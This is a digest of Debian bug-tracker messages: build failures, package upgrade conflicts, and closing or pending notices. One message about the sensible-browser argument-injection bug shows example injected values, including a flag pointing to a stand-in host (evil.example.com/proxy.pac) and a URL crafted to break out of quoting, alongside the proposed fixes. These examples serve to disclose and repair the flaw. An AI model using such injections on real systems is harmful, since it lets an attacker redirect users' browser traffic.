Bug#881898: mariadb-10.1: Uploads rejected by dak, blocking testing migration of mariadb-10.1 and its reverse dependencies

[Bas Couwenberg]

Source: mariadb-10.1
Version: 10.1.28-2
Severity: serious
Justification: makes the package in question unusable or mostly so

Dear Maintainer,

The recent upload of mariadb-10.1 remains in Uploaded status on various
architectures because as Mattia Rizzolo reported "the binary uploads got
rejected by dak because they tried to upload binaries with a lower
version than ones already installed (and built by mariadb-10.2)."

Please fix these issues so mariadb-10.1 can finally migrate to testing
and unblock the testing migration of its many reverse dependencies.

Maintainers of reverse dependencies will be forced to remove the
MySQL/MariaDB support in their packages if they want their packages to
migrate to testing otherwise. This is not in the interest of our users.

Kind Regards,

Bas

Bug#876988: marked as done (python-structlog FTBFS with twisted 17.9.0)

[Debian Bug Tracking System]

Your message dated Thu, 16 Nov 2017 06:34:15 +
with message-id 
and subject line Bug#876988: fixed in python-structlog 17.2.0-1
has caused the Debian Bug report #876988,
regarding python-structlog FTBFS with twisted 17.9.0
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
876988: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876988
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: python-structlog
Version: 16.1.0-1
Severity: serious
Tags: buster sid

https://tests.reproducible-builds.org/debian/rb-pkg/unstable/amd64/python-structlog.html

...
=== short test summary info 
FAIL tests/test_twisted.py::TestExtractStuffAndWhy::()::test_handlesFailures
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:91: Requires colorama.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:78: Requires colorama.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:121: Requires colorama.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:150: Requires colorama.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:253: Python 
3-only
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:104: Requires colorama.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_stdlib.py:86: Python 3-only
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:136: Requires colorama.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:59: Requires colorama.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_stdlib.py:92: Python 3-only
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:459: Python 
3-only
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_threadlocal.py:182: Needs 
greenlet.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:409: Python 
3-only
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:177: rapidjson 
is missing.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:67: Requires colorama.
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:269: Python 
3-only
SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:162: Requires colorama.

=== FAILURES ===
_ TestExtractStuffAndWhy.test_handlesFailures __

self = 

def test_handlesFailures(self):
"""
Extracts failures and events.
"""
f = Failure(ValueError())
>   assert (
(f, "foo", {}) ==
_extractStuffAndWhy({"_why": "foo",
 "_stuff": f})
)
E   AssertionError: assert (, 'foo', {}) == 
(, 'foo', {})
E At index 0 diff:  != 
E Use -v to get the full diff

tests/test_twisted.py:106: AssertionError
=== warnings summary ===
None
  [pytest] section in setup.cfg files is deprecated, use [tool:pytest] instead.

-- Docs: http://doc.pytest.org/en/latest/warnings.html
= 1 failed, 200 passed, 17 skipped, 1 warnings in 2.09 seconds =
E: pybuild pybuild:283: test: plugin distutils failed with: exit code=1: cd 
/build/1st/python-structlog-16.1.0/.pybuild/pythonX.Y_2.7/build; python2.7 -m 
pytest tests
dh_auto_test: pybuild --test --test-pytest -i python{version} -p 2.7 returned 
exit code 13
debian/rules:7: recipe for target 'build' failed
make: *** [build] Error 25
--- End Message ---
--- Begin Message ---
Source: python-structlog
Source-Version: 17.2.0-1

We believe that the bug you reported is fixed in the latest version of
python-structlog, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 876...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Vincent Bernat  (supplier of updated python-structlog 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Thu, 16 Nov 2017 07:08:10 +0100
Source: python-structlog
Binary: python-structlog python3-structlog python-structlog-doc
Architecture: source all
Version: 17.2.0-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Python Modules Team 

Bug#881869: FTBFS: recipe for target 'test-/5x5PF.diff' failed

[Jerome BENOIT]

Dear Aaron M. Ucko, thanks for your report.

I have already filled an issue about it:
https://github.com/Normaliz/Normaliz/issues/161

I hope it will be fixed quickly.

Cheers,
Jerome

-- 
Jerome BENOIT | calculus+at-rezozer^dot*net
https://qa.debian.org/developer.php?login=calcu...@rezozer.net
AE28 AE15 710D FF1D 87E5  A762 3F92 19A6 7F36 C68B



signature.asc
Description: OpenPGP digital signature

Bug#881885: tuxpaint: FTBFS with high degree of parallelism

[Andreas Beckmann]

Source: tuxpaint
Version: 1:0.9.22-7
Severity: serious
Justification: fails to build from source (but built successfully in the past)

Hi,

tuxpaint FTBFS during a highly parallel build. With -j16 it always
failed, with -j8 it failed sometimes. Probably anything using 2 or more
threads could fail.

msgfmt -o trans/wa.mo src/po/wa.po
...Preparing translation files...
msgfmt -o trans/el.mo src/po/el.po
msgfmt: error while opening "trans/el.mo" for writing: No such file or directory
Makefile:414: recipe for target 'trans/el.mo' failed
make[1]: *** [trans/el.mo] Error 1


Looks like a race condition between creating a directory and putting
a file into it.


Andreas

Bug#881883: libnormaliz-dev-common: fails to upgrade from 'testing' - trying to overwrite /usr/include/libnormaliz/HilbertSeries.h

[Andreas Beckmann]

Package: libnormaliz-dev-common
Version: 3.4.1+ds-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package fails to upgrade from
'testing'.
It installed fine in 'testing', then the upgrade to 'sid' fails
because it tries to overwrite other packages files without declaring a
Breaks+Replaces relation.

See policy 7.6 at
https://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces

>From the attached log (scroll to the bottom...):

  Selecting previously unselected package libnormaliz-dev-common.
  Preparing to unpack .../libnormaliz-dev-common_3.4.1+ds-1_all.deb ...
  Unpacking libnormaliz-dev-common (3.4.1+ds-1) ...
  dpkg: error processing archive 
/var/cache/apt/archives/libnormaliz-dev-common_3.4.1+ds-1_all.deb (--unpack):
   trying to overwrite '/usr/include/libnormaliz/HilbertSeries.h', which is 
also in package libnormaliz0-dev-common 3.1.1+ds-1
  Errors were encountered while processing:
   /var/cache/apt/archives/libnormaliz-dev-common_3.4.1+ds-1_all.deb


cheers,

Andreas


libnormaliz0-dev-common=3.1.1+ds-1_libnormaliz-dev-common=3.4.1+ds-1.log.gz
Description: application/gzip

Bug#881881: libtrilinos-kokkos-kernels-dev: fails to upgrade from 'testing' - trying to overwrite /usr/include/trilinos/Kokkos_ArithTraits.hpp

[Andreas Beckmann]

Package: libtrilinos-kokkos-kernels-dev
Version: 12.12.1-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package fails to upgrade from
'testing'.
It installed fine in 'testing', then the upgrade to 'sid' fails
because it tries to overwrite other packages files without declaring a
Breaks+Replaces relation.

See policy 7.6 at
https://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces

>From the attached log (scroll to the bottom...):

  Selecting previously unselected package libtrilinos-kokkos-kernels-dev:amd64.
  Preparing to unpack .../libtrilinos-kokkos-kernels-dev_12.12.1-1_amd64.deb ...
  Unpacking libtrilinos-kokkos-kernels-dev:amd64 (12.12.1-1) ...
  dpkg: error processing archive 
/var/cache/apt/archives/libtrilinos-kokkos-kernels-dev_12.12.1-1_amd64.deb 
(--unpack):
   trying to overwrite '/usr/include/trilinos/Kokkos_ArithTraits.hpp', which is 
also in package libtrilinos-tpetra-dev 12.10.1-4+b1
  dpkg-deb: error: paste subprocess was killed by signal (Broken pipe)
  Errors were encountered while processing:
   /var/cache/apt/archives/libtrilinos-kokkos-kernels-dev_12.12.1-1_amd64.deb


cheers,

Andreas


libtrilinos-tpetra-dev=12.10.1-4+b1_libtrilinos-kokkos-kernels-dev=12.12.1-1.log.gz
Description: application/gzip

Bug#881878: fpylll: FTBFS on i386: tests/test_lll.py:40: AssertionError

[Andreas Beckmann]

Source: fpylll
Version: 0.3.0+ds-1
Severity: serious
Justification: fails to build from source (but built successfully in the past)

fpylll/experimental FTBFS on i386:

https://buildd.debian.org/status/fetch.php?pkg=fpylll=i386=0.3.0%2Bds-1=1510573507=0

=== FAILURES ===
_ test_lll_lll _

def test_lll_lll():
for m, n in dimensions:
A = make_integer_matrix(m, n)
for int_type in int_types:
AA = IntegerMatrix.from_matrix(A, int_type=int_type)
b00 = []
for float_type in float_types:
B = copy(AA)
M = GSO.Mat(B, float_type=float_type)
lll = LLL.Reduction(M)
lll()
if (m, n) == (0, 0):
continue
b00.append(B[0, 0])
for i in range(1, len(b00)):
>   assert b00[0] == b00[i]
E   assert 0 == -1

tests/test_lll.py:40: AssertionError
= 1 failed, 23 passed in 88.09 seconds =
E: pybuild pybuild:283: test: plugin distutils failed with: exit code=1: cd 
/<>/fpylll-0.3.0+ds/.pybuild/pythonX.Y_2.7/build; python2.7 -m pytest 
tests
dh_auto_test: pybuild --test --test-pytest -i python{version} -p 2.7 returned 
exit code 13
debian/rules:11: recipe for target 'build-arch' failed
make: *** [build-arch] Error 25


Andreas

Bug#881877: libzip: FTBFS on several arches: encryption-nonrandom-aes* tests fail

[Andreas Beckmann]

Source: libzip
Version: 1.3.0+dfsg.1-1
Severity: serious
Justification: fails to build from source (but built successfully in the past)

Hi,

libzip/experimental FTBFS on several architectures:

https://buildd.debian.org/status/package.php?p=libzip=experimental

e.g. i386:

==
   libzip 1.3.0: regress/test-suite.log
==

# TOTAL: 119
# PASS:  113
# SKIP:  3
# XFAIL: 0
# FAIL:  3
# XPASS: 0
# ERROR: 0

.. contents:: :depth: 2

FAIL: encryption-nonrandom-aes128
=

Binary files ../encrypt-aes128-noentropy.zip and encrypt.zzip differ
encryption-nonrandom-aes128 -- FAIL: files
FAIL encryption-nonrandom-aes128.test (exit status: 1)

FAIL: encryption-nonrandom-aes192
=

Binary files ../encrypt-aes192-noentropy.zip and encrypt.zzip differ
encryption-nonrandom-aes192 -- FAIL: files
FAIL encryption-nonrandom-aes192.test (exit status: 1)

FAIL: encryption-nonrandom-aes256
=

Binary files ../encrypt-aes256-noentropy.zip and encrypt.zzip differ
encryption-nonrandom-aes256 -- FAIL: files
FAIL encryption-nonrandom-aes256.test (exit status: 1)


Andreas

Bug#881627: marked as done (ruby-http-parser.rb: FTBFS with newer http-parser version)

[Debian Bug Tracking System]

Your message dated Thu, 16 Nov 2017 00:55:42 +
with message-id 
and subject line Bug#881627: fixed in ruby-http-parser.rb 0.6.0-4
has caused the Debian Bug report #881627,
regarding ruby-http-parser.rb: FTBFS with newer http-parser version
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
881627: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881627
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: ruby-http-parser.rb
Version: 0.6.0-3+b3
Severity: serious
Tags: upstream

Dear Maintainer,

your package build-depends on http-parser, and a new version of that
one  has been around for a while. Even before eventually uploading last
night I already saw a problem in the test suite of your package.
However, due to a fault on my side, the new http-parser went to
unstable instead of experimental. So this increases the pressure for
your package, sorry about that.

With http-parser 2.7.1, one test fails:

  1) HTTP::Parser should parse request: line folding in header value
 Failure/Error: expect(@headers).to eq(test['headers'])

   expected: {"Line1"=>"abcdefghijklmno qrs", "Line2"=>"line2\t"}
got: {"Line1"=>"abc\tdef ghi\t\tjkl  mno \t \tqrs", 
"Line2"=>"line2\t"}

   (compared using ==)

   Diff:
   @@ -1,3 +1,3 @@
   -"Line1" => "abcdefghijklmno qrs",
   +"Line1" => "abc\tdef ghi\t\tjkl  mno \t \tqrs",
"Line2" => "line2\t",
 # ./spec/parser_spec.rb:347:in `block (4 levels) in '

If I understand correctly, this is taken from spec/support/requests.json
line 445 and 457f.

While doubtlessly http-parser changed the behaviour, I'm not sure yet
whether this wasn't rather about fixing bugs - bugs the test in
ruby-http-parser.rb relied upon.

However, HTTP header line folding is complicated and actually also
deprecated in RFC 7230. Reading that one and also the older description
in RFC 2616 I guess there a too many freedoms to expect a certain
result. Also it seems http-parser 2.7.1 does unfolding in a ...
surprising manner.

Now, quite frankly, my main interest is a sound solution. Otherwise,
I'm not keen on legal discussions, especially when it's about a
deprecated feature like this one. It's my job to sort these things out
with http-parser upstream but since I'm not sure how long this will
take: Would you mind disabling or relaxing the test on your side for
the time being? You might as well upgrade the test to the one in
http-parser/test.c¹ which is where obviously it was taken from in the
first place - but I'd expect this to change again soon.

Sorry for the mess, and kind regards,

Christoph

¹ https://github.com/nodejs/http-parser/blob/master/test.c (line 614)


signature.asc
Description: Digital signature
--- End Message ---
--- Begin Message ---
Source: ruby-http-parser.rb
Source-Version: 0.6.0-4

We believe that the bug you reported is fixed in the latest version of
ruby-http-parser.rb, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 881...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Cédric Boutillier  (supplier of updated ruby-http-parser.rb 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Wed, 15 Nov 2017 23:15:54 +0100
Source: ruby-http-parser.rb
Binary: ruby-http-parser.rb ruby-http-parser.rb-doc
Architecture: source
Version: 0.6.0-4
Distribution: unstable
Urgency: medium
Maintainer: Debian Ruby Extras Maintainers 

Changed-By: Cédric Boutillier 
Description:
 ruby-http-parser.rb - Simple callback-based HTTP request/response parser
 ruby-http-parser.rb-doc - Simple callback-based HTTP request/response parser 
(documentation
Closes: 881627
Changes:
 ruby-http-parser.rb (0.6.0-4) unstable; urgency=medium
 .
   * Team upload
   * Remove version in the gem2deb build-dependency
   * Use https:// in Vcs-* fields
   * Run wrap-and-sort on packaging files
   * Bump Standards-Version to 4.1.1 (no changes needed)
   * Bump debhelper compatibility level to 10
   * Add Testsuite field for autopkgtest
   * Add 

Bug#881876: astromenace: FTBFS on 32-bit arches: dh_install: astromenace missing files: astromenace_64.png

[Andreas Beckmann]

Source: astromenace
Version: 1.3.2+repack-4
Severity: serious
Justification: fails to build from source (but built successfully in the past)

Hi,

astromenace FTBFS on 32-bit architectures (tried i386 and armhf) while
it builds fine on amd64.

   debian/rules override_dh_install
make[1]: Entering directory '/build/astromenace-1.3.2+repack'
dh_install --exclude=astromenace_64.png
dh_install: astromenace missing files: astromenace_64.png
dh_install: missing files, aborting
debian/rules:28: recipe for target 'override_dh_install' failed
make[1]: *** [override_dh_install] Error 25

This could be caused by a change in debhelper.


Andreas


astromenace_1.3.2+repack-4.log.gz
Description: application/gzip

Processed: reopening 718272

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> reopen 718272
Bug #718272 {Done: Jonas Smedegaard } [src:bitcoin] upstream 
does not support stable releases (block migration to testing)
Bug reopened
Ignoring request to alter fixed versions of bug #718272 to the same values 
previously set
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
718272: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=718272
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881627: marked as pending

[Cédric Boutillier]

tag 881627 pending
thanks

Hello,

Bug #881627 reported by you has been fixed in the Git repository. You can
see the changelog below, and you can check the diff of the fix at:


https://anonscm.debian.org/cgit/pkg-ruby-extras/ruby-http-parser.rb.git/commit/?id=fa0a473

---
commit fa0a473327b3281570887a81a304c6ed8ac52dc0
Author: Cédric Boutillier 
Date:   Wed Nov 15 23:16:15 2017 +0100

prepare changelog

diff --git a/debian/changelog b/debian/changelog
index 281ca03..a51e283 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,17 @@
+ruby-http-parser.rb (0.6.0-4) unstable; urgency=medium
+
+  * Team upload
+  * Remove version in the gem2deb build-dependency
+  * Use https:// in Vcs-* fields
+  * Run wrap-and-sort on packaging files
+  * Bump Standards-Version to 4.1.1 (no changes needed)
+  * Bump debhelper compatibility level to 10
+  * Add Testsuite field for autopkgtest
+  * Add 0006-disable-folding-header-test.patch to support newer http-parser
+(Closes: #881627). Thanks Christoph Biedl for the patch!
+
+ -- Cédric Boutillier   Wed, 15 Nov 2017 23:15:54 +0100
+
 ruby-http-parser.rb (0.6.0-3) unstable; urgency=medium
 
   [Sebastien Badia]

Processed: Bug#881627 marked as pending

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tag 881627 pending
Bug #881627 [src:ruby-http-parser.rb] ruby-http-parser.rb: FTBFS with newer 
http-parser version
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881627: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881627
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881864: luksmeta FTBFS: test failures

[Christoph Biedl]

tags 881864 confirmed help
thanks

Adrian Bunk wrote...

> https://buildd.debian.org/status/package.php?p=luksmeta=sid

> FAIL: test-lm-assumptions
> FAIL: test-lm-init
> FAIL: test-lm-one
> FAIL: test-lm-two
> FAIL: test-lm-big
> FAIL: test-luksmeta

Weird. While I always test-build on at least two different architectures
on plain Debian schroots before uploading, appearently there is something
different on the release architecture buildds.

Failing is test.c around line 151:

| r = crypt_format(cd, CRYPT_LUKS1, "aes", "xts-plain64",
|  NULL, NULL, 32, NULL);
| if (r < 0)
| error(EXIT_FAILURE, -r, "%s:%d", __FILE__, __LINE__);

which fails with "test.c:151: Input/output error"

According to strace (seen on amdahl 4.9.0-4-arm64):
| socket(AF_ALG, SOCK_SEQPACKET, 0) = -1 EAFNOSUPPORT (Address family not 
supported by protocol)
while I get
| socket(AF_ALG, SOCK_SEQPACKET, 0) = 5
on my private boxes.

Also confusing, this is in libcryptsetup. For the moment, I can only
wild-guess about what's happening here.

Christoph


signature.asc
Description: Digital signature

Processed: Re: Bug#881864: luksmeta FTBFS: test failures

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 881864 confirmed help
Bug #881864 [src:luksmeta] luksmeta FTBFS: test failures
Added tag(s) help and confirmed.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881864: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881864
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881869: FTBFS: recipe for target 'test-/5x5PF.diff' failed

[Aaron M. Ucko]

Source: normaliz
Version: 3.4.1+ds-1
Severity: serious
Tags: upstream
Justification: fails to build from source (but built successfully in the past)
User: debian-powe...@lists.debian.org
Usertags: powerpc ppc64 ppc64el

Builds of normaliz 3.4 for arm64, ppc64el, s390x, and the non-release
architectures powerpc and ppc64 (but for some reason not powerpcspe)
have been failing:

  /<>/normaliz-3.4.1+ds/_build/../test/Makefile.classic:52: recipe 
for target 'test-/5x5PF.diff' failed

I don't know what the diff turned out to read (or even whether it's
the same on all of these architectures!), but perhaps you can
reproduce the problem on a porter box.

Could you please take a look?

Thanks!

--
Aaron M. Ucko, KB1CJC (amu at alum.mit.edu, ucko at debian.org)
http://www.mit.edu/~amu/ | http://stuff.mit.edu/cgi/finger/?a...@monk.mit.edu

Bug#881767: closed by Bastien Roucariès <ro...@debian.org> (Bug#881767: fixed in sensible-utils 0.0.11)

[Gabriel Corona]

Hi,

> Source: sensible-utils
> Source-Version: 0.0.11
> 
> We believe that the bug you reported is fixed in the latest version of
> sensible-utils, which is due to be installed in the Debian FTP archive.

I can't find the source of the new version yet so I can't review it
yet.

I think we need to exclude URI starting with `-` or `--` as
well. Otherwise an attacker might pass flags (such as
--proxy-pac-url=http://evil.example.com/proxy.pac) with:

BROWSER=chromium sensible-browser 
proxy-pac-url=http://evil.example.com/proxy.pac

Seometing like:

  if ! echo -n "$URL" | head -n1 | grep '^[a-zA-Z][a-zA-Z0-9+\-.]*:' > 
/dev/null ; then
exit 1
  fi

or:

  if ! echo -n "$URL" | grep -z '^[a-zA-Z][a-zA-Z0-9+\-.]*:' > /dev/null ; then
exit 1
  fi

or:

  case "$1" in
  -*)
  exit 1
  ;;
  *)
  true
  ;;
  esac

By the way, this line is vulenable as well:

  exec /usr/bin/gnome-terminal -e "/usr/bin/www-browser ${URL:+\"$URL\"}"

For example:

  URL='http://www.example.com/; "--incognito' ; /usr/bin/gnome-terminal -e 
"chromium ${URL:+\"$URL\"}"

A possible fix is to use:

  exec /usr/bin/gnome-terminal -- "/usr/bin/www-browser" ${URL:+"$URL"}

Cheers,

-- 
Gabriel

Bug#881816: marked as done (openstack-dashboard: fails to install non-interactively: postinst debconfage fails)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 22:20:54 +
with message-id 
and subject line Bug#881816: fixed in horizon 3:12.0.0-4
has caused the Debian Bug report #881816,
regarding openstack-dashboard: fails to install non-interactively: postinst 
debconfage fails
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
881816: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881816
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: openstack-dashboard
Version: 3:12.0.0-3
Severity: serious
Justification: fails to install, makes rbdeps FTBFS

Hi!
When installing openstack-dashboard non-interactively, it fails with:

Setting up openstack-dashboard (3:12.0.0-3) ...
dpkg: error processing package openstack-dashboard (--configure):
 installed openstack-dashboard package post-installation script subprocess 
returned error exit status 30

Interactively, it asks questions then succeeds.  But as it's a
build-dependency of several packages (ironic-ui, manila-ui, etc), it must
be installable inside sbuild.


Meow!
-- System Information:
Debian Release: buster/sid
  APT prefers unstable-debug
  APT policy: (500, 'unstable-debug'), (500, 'unstable'), (500, 'testing'), (1, 
'experimental')
Architecture: armhf (armv7l)

Kernel: Linux 4.14.0-00115-g3d7c587c4c1b (SMP w/4 CPU cores; PREEMPT)
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8), LANGUAGE=C.UTF-8 
(charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages openstack-dashboard depends on:
ii  adduser3.116
ii  debconf [debconf-2.0]  1.5.65
pn  libjs-jquery   
pn  libjs-jquery-cookie
pn  python 
pn  python-django-horizon  

openstack-dashboard recommends no packages.

Versions of packages openstack-dashboard suggests:
pn  memcached   
pn  openstack-dashboard-apache  
--- End Message ---
--- Begin Message ---
Source: horizon
Source-Version: 3:12.0.0-4

We believe that the bug you reported is fixed in the latest version of
horizon, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 881...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thomas Goirand  (supplier of updated horizon package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Wed, 15 Nov 2017 21:53:27 +
Source: horizon
Binary: horizon-doc openstack-dashboard openstack-dashboard-apache 
python-django-horizon
Architecture: source all
Version: 3:12.0.0-4
Distribution: unstable
Urgency: medium
Maintainer: Debian OpenStack 
Changed-By: Thomas Goirand 
Description:
 horizon-doc - web application to control an OpenStack cloud - doc
 openstack-dashboard - web application to control an OpenStack cloud
 openstack-dashboard-apache - web application to control an OpenStack cloud - 
Apache support
 python-django-horizon - Django module providing web interaction with OpenStack
Closes: 881816
Changes:
 horizon (3:12.0.0-4) unstable; urgency=medium
 .
   * Fixed debian/openstack-dashboard.templates. Huge thanks to Justin for his
 perfect work on the English templates.
   * Fixed installing in non-interactive mode (Closes: #881816).
Checksums-Sha1:
 e92ee54da83c53d64d7c9e59087816a6a4ce3fa1 4781 horizon_12.0.0-4.dsc
 d12eb5a5f6f0828004a3d11d31b92e1b0dd57297 26524 horizon_12.0.0-4.debian.tar.xz
 b0971e6584564b6433b605cf956318fee1a70ea0 1869876 horizon-doc_12.0.0-4_all.deb
 de0a03111ce6b0cc85cccd62e57c9e56dc528a74 17886 horizon_12.0.0-4_amd64.buildinfo
 132736637987ff94c9cd984f80532802eb2c9de5 14088 
openstack-dashboard-apache_12.0.0-4_all.deb
 e1da1cc85d15728ed7180ff8dfbbf0f526506e7b 2233536 
openstack-dashboard_12.0.0-4_all.deb
 3892ec5ed663eb6dbb80132bb8cc099bfb249844 1995076 
python-django-horizon_12.0.0-4_all.deb
Checksums-Sha256:
 d299f8c4c1d0c0b1b77e88680e33052066302e4e6347787fc503a1c7a6d644a8 4781 
horizon_12.0.0-4.dsc
 4395fb042ac9003d6ec473a8271a5812106da45f000798536dfd320b72c3e266 26524 
horizon_12.0.0-4.debian.tar.xz
 af73252d716080b860f93319536c4092c2c721084bd76ba75a599111b9d8a629 1869876 

Processed: Bug#881816 marked as pending

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tag 881816 pending
Bug #881816 [openstack-dashboard] openstack-dashboard: fails to install 
non-interactively: postinst debconfage fails
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881816: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881816
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881816: marked as pending

[Thomas Goirand]

tag 881816 pending
thanks

Hello,

Bug #881816 reported by you has been fixed in the Git repository. You can
see the changelog below, and you can check the diff of the fix at:


https://anonscm.debian.org/cgit/openstack/services/horizon.git/commit/?id=6a61143

---
commit 6a6114391c11cb22ec28ca0273ebc719a756a954
Author: Thomas Goirand 
Date:   Wed Nov 15 21:54:06 2017 +

Fixed installing in non-interactive mode (Closes: #881816).

diff --git a/debian/changelog b/debian/changelog
index de97850..8a04cc5 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,9 +1,10 @@
-horizon (3:12.0.0-4) UNRELEASED; urgency=medium
+horizon (3:12.0.0-4) unstable; urgency=medium
 
   * Fixed debian/openstack-dashboard.templates. Huge thanks to Justin for his
 perfect work on the English templates.
+  * Fixed installing in non-interactive mode (Closes: #881816).
 
- -- Thomas Goirand   Wed, 15 Nov 2017 00:03:34 +0100
+ -- Thomas Goirand   Wed, 15 Nov 2017 21:53:27 +
 
 horizon (3:12.0.0-3) unstable; urgency=medium
 

Bug#881864: luksmeta FTBFS: test failures

[Adrian Bunk]

Source: luksmeta
Version: 8-2
Severity: serious

https://buildd.debian.org/status/package.php?p=luksmeta=sid

...
/usr/bin/make  check-TESTS
make[3]: Entering directory '/<>'
make[4]: Entering directory '/<>'
PASS: test-crc32c
FAIL: test-lm-assumptions
FAIL: test-lm-init
FAIL: test-lm-one
FAIL: test-lm-two
FAIL: test-lm-big
FAIL: test-luksmeta

Testsuite summary for luksmeta 8

# TOTAL: 7
# PASS:  1
# SKIP:  0
# XFAIL: 0
# FAIL:  6
# XPASS: 0
# ERROR: 0

See ./test-suite.log

Makefile:995: recipe for target 'test-suite.log' failed
make[4]: *** [test-suite.log] Error 1

Bug#881767: marked as done (sensible-utils: Argument injection in sensible-browser)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 21:10:37 +
with message-id 
and subject line Bug#881767: fixed in sensible-utils 0.0.11
has caused the Debian Bug report #881767,
regarding sensible-utils: Argument injection in sensible-browser
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
881767: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: sensible-utils
Version: 0.0.10
Severity: grave
Tags: security
Justification: user security hole

When the BROWSER environment variable is set, an invalid URI can be
used to inject arguments in sensible-browser.


Description
===

When BROWSER is set, sensible-browser calls the actual browser with:

~~~sh
cmd=$(printf "$i\n" "$URL")
$cmd && exit 0
~~~

If a IFS character is in $URL, this leads to the injection of extra
arguments when calling the actual browser.

For example, this commands triggers the incognito mode of Chromium:

~~~sh
